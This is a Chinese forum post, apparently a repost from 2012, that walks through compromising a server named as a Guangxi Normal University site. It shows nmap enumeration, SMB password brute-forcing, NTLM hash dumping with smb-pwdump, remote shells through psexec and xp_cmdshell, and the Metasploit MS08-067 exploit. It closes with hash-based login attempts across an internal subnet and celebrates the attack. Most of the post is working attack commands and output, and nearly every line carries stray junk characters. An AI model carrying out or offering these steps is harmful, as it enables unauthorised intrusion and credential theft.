广西师范网站http://202.103.242.241/* y9 q) P+ u2 [1 e
% F5 k! d. b6 n: w) Y3 L/ y Kroot@bt:~# nmap -sS -sV 202.103.242.241
# l3 |0 K0 J V8 j, n
0 V+ `# H* c9 n% F& J3 v7 zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
8 @- i+ c: d2 {/ N# f' C: N* W
1 ^7 r7 h; g* o9 X' H wNmap scan report for bogon (202.103.242.241)
3 |2 Y# A5 V1 l; Y. B$ Q1 O; G* M8 }; |! L: j; W. J9 F) W
Host is up (0.00048s latency).
# [! F \) j9 i' c: Y$ m& W/ R3 l) N1 t, \* ~' `
Not shown: 993 closed ports
0 n8 a$ ~) o7 R' h* I: T6 c) X. V' \
PORT STATE SERVICE VERSION
4 V; J4 Z* [' [# S! d' D* x7 Z. c( N) {) H! W/ J* x& s/ G5 L* w
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
v0 A& Y9 N4 c6 V& j: k. x/ w6 @7 q0 i. W6 `
139/tcp open netbios-ssn
2 t* r6 A6 \# S$ ~) F7 I* ^7 {: \$ y/ }" p" t2 Z9 F9 A; Z
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds5 L. H8 m+ c( r, B# r8 x5 f. J( s
3 x3 M" l8 \% U" ~
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)9 k% ]8 T# Z" h* o
* s) G# h5 W: x0 T2 J4 r1026/tcp open msrpc Microsoft Windows RPC
9 T: ~6 u. n! }' x2 m' u
+ y0 _7 ~5 S5 |5 X+ n- i3372/tcp open msdtc?* T) Z% s' t. C- S( M
4 \2 ~0 |/ u7 x: }" ~2 @3 W
3389/tcp open ms-term-serv?
! _1 a d* \9 s9 x$ }8 C' ^5 i8 J) S- V
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
( y0 ~& _% P c3 Q& t7 g$ \# o* kSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r: O P9 j. B( t& a- e+ u: a- O
6 H% Z( L' S- V/ I8 m( V7 E) BSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
5 N, r" j' L- K# G7 i) N
4 T' t) ]2 g) [8 _9 sSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
1 ^( {5 X, H, S) G3 k; H5 Q* q* L& L
2 k# u/ I' b9 \" K3 n' t0 USF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
7 S- P& `$ L, h6 Q+ S# O* ?3 R) j. O( ?9 Q
SF:ptions,6,”hO\n\x000Z”);
0 ~+ m: Y6 j! l" z8 i- ]* [+ o5 h% b" g; \5 n- O) d y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)! q; s, n* o( [" b2 k% T
2 Z- ~4 k- r5 W4 D( F" ` v
Service Info: OS: Windows
5 S- j1 K! L6 F* R) W0 x. Q- S5 E' W6 a! u: ]7 N) T& c9 k
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .( d$ s! h! H- N, l' h7 ]
8 e& R0 C, B; m( A& D8 KNmap done: 1 IP address (1 host up) scanned in 79.12 seconds8 f9 g& g- z: J6 S
/ O6 g* f) _' o" sroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
; b( F) n l( q" f/ t* i2 M
9 P- G* H7 E9 P! T; U-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse7 n2 \& F( q7 r
0 P: |" r7 V% s-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
2 O3 Z) D; E+ [: {
2 t+ T1 B* c# t1 S-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse8 [# q" j& F* d' S
' v0 V- h" x6 E1 H) L( d
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
. [* w7 P- R: w$ @% v6 Q% Y7 k' N# [ I# C7 o& e. \
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse# Q8 h) e% k ?7 @6 J3 A
2 F% H" s2 G. D) L-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
6 ]0 e# N* S {1 z9 Q4 x5 P# v1 J9 z) F" I0 X
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
4 R8 B) i/ Q; K# [2 E8 ?0 I. A
$ c9 ^0 g, {" ^$ B5 C9 Z-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
, C$ }; P4 G6 z- Q* x1 d( V
0 u# P3 a# S4 U! B: f; f-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
2 i4 x" K& T+ k% k6 u: z
% _; C6 w8 ^2 Q" O) n# V% H-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
( C1 j9 b8 G6 J) l1 [* F+ R7 G% F4 {2 w9 F7 }4 |8 P) X
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
z9 P2 O" z. j. n" w: T
( ]) C) N& U! Y# Y+ V. N-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse) ?& x. u! y9 p6 Y
0 M I% D% v, _1 V) o8 Y2 J% ]
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
* g$ Y( n( ]3 E8 d/ T7 s" Z2 D
6 K) J3 e( W2 y. d# m- M$ Q4 b-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ `+ ]* z: t& ~2 w$ l
9 f# n1 g. e) P5 f-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse" j& X: q" G( Z. N9 L, {
& f8 K( |0 J$ _0 `, S4 O9 broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 9 W% z" m5 E% r4 \
( b* n! \" T5 d' t, W; B" g+ L6 c//此乃使用脚本扫描远程机器所存在的账户名: I, U/ u2 H7 t( y
- x- P* [! O D3 }# s7 X( |Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST7 u7 M% W* e3 H' w. y
+ p7 ~8 L% i' h$ v* s; X0 xNmap scan report for bogon (202.103.242.241)
$ O: b2 |# `0 K; z( t, I; z, T8 A+ H/ G* }
Host is up (0.00038s latency).$ }6 ]! E: a$ f. V7 i) ~& i$ Q+ L
, r, T9 U, }& }4 ?1 m! A* DNot shown: 993 closed ports) C: E' @$ L/ G, `" k: V
+ ~& `+ \) L6 F- l4 b! S% `+ x3 UPORT STATE SERVICE
9 M1 l8 ], s- o1 |" B
, ~4 w- ?7 `( Q. v& c* C7 m* |135/tcp open msrpc6 i/ k! b, J; [4 k/ T
2 A3 l" X. d. {( ~( g) f
139/tcp open netbios-ssn+ e$ n" _7 F8 h* B# F: l' p( N" i
' h; P1 |! |- m; C* O; J. \! @
445/tcp open microsoft-ds
$ h8 M6 o- O8 A3 ~- |6 l& E/ p
6 n; K" m% _7 ~4 I; u. c0 K1025/tcp open NFS-or-IIS1 E1 S: G- y4 [" R. z; y9 [
% H! V# K' t% E: I3 B
1026/tcp open LSA-or-nterm0 D, E& K0 h" @6 @$ d
1 E0 r+ Z* A J- Z* t5 n q3372/tcp open msdtc
# a" w9 x8 N! {9 J3 G8 w
' |9 r6 w) d h# l( u! u3389/tcp open ms-term-serv- T+ k; m: C& _' \% W- b& G% b7 J
9 b7 Y) P' m& z$ b+ s" R, KMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' b% U, o# m8 G. k$ u
( N+ L$ d9 E$ h/ q% m9 B
Host script results:6 u# o+ b4 D8 w$ h, J5 x- p2 U, f' J
, V' n, j/ ~8 \3 O2 D; x' V, k| smb-enum-users:0 T/ O$ d: d2 I- l
8 \, {5 g( l6 N! {! p( [: A
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
% q' P4 w( H% ?4 w
0 l. a3 y( s4 G1 ^/ f0 v+ u/ ENmap done: 1 IP address (1 host up) scanned in 1.09 seconds7 k. Z+ B' C0 f. k5 F4 z" Q9 d2 F
& |& ?" h3 C, Jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
7 E! u. K$ _( H3 f. N) {4 [) R1 A0 {. b8 d
//查看共享
' V4 r& N4 q' u: x" ~( f, \) b3 [* V; S
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
* l0 L' C3 G. T7 N5 `( C
8 A5 X# V/ w" @5 H1 X& ^Nmap scan report for bogon (202.103.242.241), _2 \/ @# o+ X* e% M) W' r" f3 e- i
( O1 D' @& K9 j) Q$ R& V7 p
Host is up (0.00035s latency).
+ f7 J( w- r. n
" @$ h9 q! m% d, k% dNot shown: 993 closed ports$ b9 g9 S' R/ M+ ^
6 u# h U. Y) M6 [8 a h7 ]
PORT STATE SERVICE, t% x8 ?8 s" ^) G7 m
/ ]9 {/ o* U- F+ {
135/tcp open msrpc6 C9 m1 C. e# N) Z/ W, T. K
3 k/ K! f1 Z& T" q1 }) E. {
139/tcp open netbios-ssn& J: V* }! @. q/ J$ D' J
+ C4 ^& y% k$ e+ `. b) R445/tcp open microsoft-ds7 m, @. k6 M: H7 O3 I
9 f% j T3 j" H0 q9 A2 d1025/tcp open NFS-or-IIS, [6 I d$ M% \4 C. P4 G
; X/ @; J5 }" n0 i- ?1026/tcp open LSA-or-nterm7 h `9 {3 A3 @6 n9 r. G& V# p) T6 e
. V8 r8 s' h6 l3 s) K. O5 z
3372/tcp open msdtc
4 _/ o5 N0 `0 R0 a8 a
$ Q- V' l+ R, P7 x/ e3389/tcp open ms-term-serv
& y/ E/ ^. @7 L1 _
) W ^" d$ M& V, s" N1 |) c! ^MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 Z# C8 K4 T( V; D" v
0 [7 ^) I7 Y# U3 _/ n; b" ?- e
Host script results:9 U0 u" C/ A$ h# F- R, j3 L
2 N3 l( z7 @* u4 A7 z
| smb-enum-shares:. H/ J0 M$ f. [9 ]3 Y# B4 p
- U4 G6 M) j5 P) H: ?2 @2 |: r& C| ADMIN$
4 H- I1 Z, w/ y4 }4 |* U9 K" W% n4 O, J
| Anonymous access: <none>
4 z5 x0 k& p' c4 ?8 V+ {) ^( V& I: `/ g
| C$
( W3 o9 v6 E. j4 Q9 u7 A W, N/ V5 t7 \+ ]
| Anonymous access: <none>5 k% j/ p+ z1 @1 q
; x5 [: V- Y' x: ~4 m. {, Q, p
| IPC$, h4 S) P8 r8 C$ ~- }, |
# n, u9 `* l/ u/ `* W% n
|_ Anonymous access: READ
, r$ n- c6 ~5 w' X, J7 Y) b" z% w
' c/ D) m: ~# @! m+ {4 Q5 m4 bNmap done: 1 IP address (1 host up) scanned in 1.05 seconds+ z8 S4 E0 y6 @6 F/ q8 C
7 z, y1 D" d5 ^root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 K7 c) w: A! G1 r: r
" k* F7 c" s: W8 ~4 \, N
//获取用户密码+ J# _6 N( U4 d; \9 j O
/ }! g5 L/ t2 T9 H, _Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST5 Z! Z7 x' N C3 k) {3 g( H2 \
; l. v4 c; Q0 l8 y9 O- Z2 B
Nmap scan report for bogon (202.103.242.2418)
. u3 M" _& ~" c: d1 r% e+ V3 o; k* ?- N+ G! S; a
Host is up (0.00041s latency).
( L& N' @: `! o3 f8 e7 h: A* F" n W% K" I, ]; a, o
Not shown: 993 closed ports" ^* ]0 n% v6 z) a4 B
1 |3 R6 w# \: k: D8 S( Z0 B
PORT STATE SERVICE
3 z( R% c& X9 E8 L* t% ~5 i
" W2 B* H2 O: }* K; v% I: B135/tcp open msrpc! j% n. F; `+ t" F/ E' a
% s9 M, c- H* _139/tcp open netbios-ssn% D7 c* f$ f) i) V/ Q: y
9 z, j( ]( l5 S [445/tcp open microsoft-ds
) m: c% V& r. e9 ~; ~5 E
o4 z% c% O4 t# p T. e3 J0 V4 d1025/tcp open NFS-or-IIS
0 k# C! j# k7 x0 P2 s0 ? b$ A% {+ o+ Y% Y8 m$ |
1026/tcp open LSA-or-nterm) M% T" X& H& y+ D
3 X& ? [& T3 F
3372/tcp open msdtc ?. u& Y" v) u9 V' K+ E- r
/ |" Z6 R. O. f% U2 J" r, a) g/ {3389/tcp open ms-term-serv
) _7 C+ {! t- i) v5 D; m
- x+ H0 y7 {% O. i7 B4 ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 X7 L* j5 X4 u4 I
" Z- X8 f; ]+ u) f; {Host script results:8 h3 Q* y+ \- k
2 e: X2 O/ w, F( n( I% C| smb-brute:5 m7 v9 b8 u9 d1 n' h$ b
& m0 m4 }- i6 ?, l6 G0 B
administrator:<blank> => Login was successful# d8 x1 s3 B' `/ d; v, ~1 e
( E9 `# F7 K/ L, `+ B0 I: t|_ test:123456 => Login was successful3 u7 L% f, Y+ t9 a' u/ T: u
* D0 k3 m$ ?( d/ N( I6 E2 \/ D; CNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
: T' K3 |( ~$ H" t
0 e3 `2 [. Z1 `- _root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash: G9 l. l3 s4 k" d1 V9 k" Y1 C; N/ v. `
! X/ j; U G& n* {+ U
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
% x) R: j0 J1 L$ R" D
0 f' N9 q4 F7 O- Hroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
9 S9 `8 L4 C* o
( ?& x+ `0 f' a2 I5 U4 C8 wroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1399 {$ w4 Z- c- P+ `
+ X {* i2 @) t! Z6 WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
" K6 q) D8 v Y5 f+ t7 g7 t
+ L' v m# }4 f( E9 `% ^Nmap scan report for bogon (202.103.242.241)
$ E+ g. R8 d2 r- _
+ ~9 E* z4 W0 r# B& aHost is up (0.0012s latency).
, A2 ? W$ w. f2 c2 O5 S5 ?% x" c! m4 }6 \
PORT STATE SERVICE) g3 b5 Z# Y; n( f
6 R# _. ^1 E* H5 V1 v" I, o
135/tcp open msrpc1 b; {* B: {- _; A4 A, A3 T
/ t1 u3 L3 e# K! {+ p- s139/tcp open netbios-ssn
# n" L% f: R* D3 W" ~
- P. _- W) D1 `/ _- F% w7 R445/tcp open microsoft-ds2 F& D0 I! a7 J3 g8 O% w
- @6 l0 z- O3 Y5 z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- D3 O/ V7 f. s6 B7 x8 z' @8 V+ [# Z: g) v# T. a
Host script results:
$ r7 e( l5 P9 f+ g) L9 \0 A+ s+ z9 F; s+ U$ I
| smb-pwdump:
* k3 }$ i' r: n/ }9 m6 N
6 w z e6 @& _1 j, f, d, _& p| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************. S$ J: t4 t: @! z
. V1 d+ \% R; R1 j| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
0 ^% Q7 c+ K; h ?9 c& t' Z) `+ g7 N1 E- e+ z
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
+ Y: c1 u0 y4 D! j7 v3 h* o+ D4 V3 W" c9 G3 }* l
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2" z5 t) P) `' ^0 o3 m$ n
$ ~) N* w# I+ m) M+ d4 d- E" s
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
/ h+ `1 q& s7 j7 s2 J9 O" E/ p. p
0 {7 N4 o0 v5 Z9 YC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
; H* R3 K- W& ^$ V. B/ {' s* m1 R* Z# q. g2 w/ K
-p 123456 -e cmd.exe
* _* i+ d8 ?7 \( ?* j+ `: n* Z5 J. p% B9 k6 k
PsExec v1.55 – Execute processes remotely# j% u! `0 R* J/ H0 D4 I
. `; q+ @# c2 J C6 V/ k4 G
Copyright (C) 2001-2004 Mark Russinovich7 }2 z( p* }. E0 u; R! z# o' g
2 ]% O: }9 R- n' ?" N* X" rSysinternals – www.sysinternals.com: i4 ~( J, C2 e! {; K/ L6 y2 D
6 D& T" }4 r# k1 Y! E) a5 N
Microsoft Windows 2000 [Version 5.00.2195]& E4 e* S% G+ g' z$ P- k4 b
. I* R8 w. V8 e) A(C) 版权所有 1985-2000 Microsoft Corp.
! ^6 S7 w7 s! Y& T x7 X0 [4 m3 @) m+ r& ?9 {, D* W3 \# o
C:\WINNT\system32>ipconfig' t6 n' p k5 m. m4 U% k1 w6 [
. Q3 e8 n% P: `# r% m8 e2 D- p
Windows 2000 IP Configuration
& p5 k8 ?3 ?4 c- ]! Z& l& d8 N+ h: s' W# t- {+ q
Ethernet adapter 本地连接:5 }. | U' m9 z l P/ W5 _
9 y7 m' ~, \: o0 HConnection-specific DNS Suffix . :
?9 D& W2 M7 l% ]3 A' z; P* F8 u/ U
' a C5 `6 h' E) W- MIP Address. . . . . . . . . . . . : 202.103.242.241
8 _7 p# X. u9 Y8 o$ v
( C: L$ n0 i8 pSubnet Mask . . . . . . . . . . . : 255.255.255.0) N2 n& H9 I: W @+ N+ [6 W% @
* F. Q+ ~/ w3 W# G4 H' {Default Gateway . . . . . . . . . : 202.103.1.11 D5 S6 W! y& ?0 [7 ?; S
4 D* b$ S4 a* t6 K' |9 VC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
' j. x9 D) _+ R( C8 N/ O4 p# h
9 m A8 k- ~- J0 a1 Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞+ G9 b: S+ E9 C# ^7 J# f
' D0 f# q6 k# b2 G, B$ NStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST3 G6 x4 \1 L8 z: H3 W( S
* @& I* V8 V% H# z( dNmap scan report for bogon (202.103.242.241)
+ {* e0 F% v& J. T7 _: X8 `" L! Q6 }: U% Y$ ?
Host is up (0.00046s latency).
2 o; F3 ^ ~$ m- p$ d% W$ Y& \; K: F) N a* a/ e/ J, M6 A
Not shown: 993 closed ports. V& m5 ~. f3 c8 H! y# f( l9 e# P
; X- n" e0 }! K. {( J5 H" ?3 E
PORT STATE SERVICE
5 h8 n2 m! |5 I: Z; f& t, G" N/ {' Q
- q* g4 [+ O% B& b7 W& n* e135/tcp open msrpc
, S0 ~$ w- G; O) a) v& H' W1 w2 D
139/tcp open netbios-ssn; x/ D+ v* t% M; _, E! A
) c4 u* o( T- _9 l* Z# o
445/tcp open microsoft-ds
( n/ r2 d. ]& u6 b8 v2 ~. V( S( ^3 u! |5 P/ Z
1025/tcp open NFS-or-IIS
- ]0 a- Y2 L- ^6 e5 o) f5 N9 W" {
5 G4 Z' x6 ]7 W. m& H1026/tcp open LSA-or-nterm
. W c. j( ~# X+ e2 ^- u
+ ` Z2 T- G) `9 l9 P+ K0 Y3372/tcp open msdtc
a) {! i" w, L( n& a* T8 F" [" H# |8 I1 S e! L
3389/tcp open ms-term-serv! Q/ v: U/ L5 U) m6 |" `+ \$ w4 j, g
! ^/ \( B/ T2 i$ g9 dMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
6 |3 U4 _3 I. y: O/ I; h! }5 c; I
Host script results:
2 M: H4 Q& N4 h1 m8 w. s5 S# z- C2 e
| smb-check-vulns:" B! `3 D* l* o. o! Y4 S" y
2 M4 a. m6 L. W5 |& R/ L' D
|_ MS08-067: VULNERABLE {0 q2 A6 @( Q& l
! u+ i4 z9 [( f
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
8 k$ l; t0 t. ?/ U
5 S C# r2 k( F9 v) M3 oroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出9 G5 x* D) W; h+ I% T
1 h' o! z9 c7 V+ C1 b8 |msf > search ms086 I1 o; l. ]$ A( l2 a3 u/ e1 ]) Y2 ~
+ z) l/ O* P! g7 p) A9 Mmsf > use exploit/windows/smb/ms08_067_netapi6 K8 m' [% f5 k1 W* p0 Q L
' Y7 u4 ` {* C+ t3 |msf exploit(ms08_067_netapi) > show options) l, u! Z* x9 e0 B8 r9 B5 r8 ^
+ L7 {6 f3 \8 ], w1 C% V e/ Cmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
% t% Q: {0 s) b8 c" h
4 a) h$ \3 [3 F# u# _msf exploit(ms08_067_netapi) > show payloads
9 U0 Z- b8 O! U# w H: K- v
" p) @" ?0 O1 Amsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
/ i& V5 r) c# r( ^8 m% O# f, t
6 W8 P: X6 f9 N) ^msf exploit(ms08_067_netapi) > exploit
8 Y& o' y6 _" H4 C0 K% p# D3 g6 O! j4 P6 U# u* g* [
meterpreter >0 [8 `2 p$ j/ D$ z, h, Y' D
0 G0 ~2 L( p; Z
Background session 2? [y/N] (ctrl+z)
' g8 h, G @; ]5 W6 J& A- @, _6 d' k6 w# Z8 p2 }
msf exploit(ms08_067_netapi) > sessions -l
9 c( D! @* x1 D" c4 o5 q7 }+ C$ g0 R7 J2 i# V. N
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
. g0 e* ?7 Y9 u' ~; o, H9 F. h. j C3 r, C5 T
test
, J+ Q7 G/ M5 N" ?; z1 l- `1 I1 E2 j% S# N4 M6 w+ {
administrator. {+ i B3 \$ w% A3 j; Z! {* i. J9 s
6 b" B- Z* X- r/ k! Y
root@bt:/usr/local/share/nmap/scripts# vim password.txt ^: a# |: c6 p
8 r. P" w" G9 T/ y44EFCE164AB921CAAAD3B435B51404EE; U8 e) `1 f. r% ^. O F' f; |
% ^, t# v- _1 H/ f0 l
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ) ]' x& L @& w- j8 j, [! z: }- y
3 C6 ~) x" _( x% |, j //利用用户名跟获取的hash尝试对整段内网进行登录& a) ?7 T* E3 e! M1 O, ~
5 M/ l k) N" j
Nmap scan report for 192.168.1.105/ _+ ^- {4 z# @$ X5 i
4 F5 \+ f3 @) k4 YHost is up (0.00088s latency).
7 |/ s. f! r5 ?+ d
- v; U& U* ^2 A! \Not shown: 993 closed ports3 C5 p# j2 z/ G% W( j7 v I
5 u6 t5 }- p |( {( C6 h
PORT STATE SERVICE( B) {* l% Z" m% S8 p
8 {! j" R9 c6 j. I/ p
135/tcp open msrpc
7 Z n0 r1 n: V W: e8 g! V) T4 x2 l" L. a
139/tcp open netbios-ssn7 @6 }/ O! p% A- A9 H8 k2 R
! w4 b) S' R* R; A: u3 q! b" T445/tcp open microsoft-ds
4 q7 y( I, `! `( m
. ^0 |9 _6 B! r( g) |* n1025/tcp open NFS-or-IIS
4 s- a4 y; t; N9 {
5 p2 P& k ^3 N( b$ `; P( D1026/tcp open LSA-or-nterm
9 `! o' A% u# y! Q
9 o( p: i, O+ t6 q5 G6 P3372/tcp open msdtc
; B5 \# E2 B7 w8 x# Y
- Z1 |6 W" _; @$ U, a u. y2 I3389/tcp open ms-term-serv4 Q: r$ h4 y( ^% ~
6 h, H; p1 h3 ]% l6 O( o3 r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' I3 l q" n: D6 P4 E+ S8 f; ~1 ~! R
Host script results:
- r" R+ Z6 X C8 s, O3 h) s1 ?, T6 a: z& I( w8 |2 m' U- D1 ^, L! z
| smb-brute:
% q+ X3 ?4 h) d0 C8 t! n: B! Z4 Z- [6 u- \! P
|_ administrator:<blank> => Login was successful
) W6 m1 Y& n' _" B. ?' m) D8 Q2 h/ ]& ]; `! P$ T
攻击成功,一个简单的msf+nmap攻击~~·1 z3 X: X5 q- k; a5 d+ U2 Y$ s/ G
" e( ^1 U% [: k5 C1 ? |
发表于 2012-12-4 12:46:42
收藏
支持
反对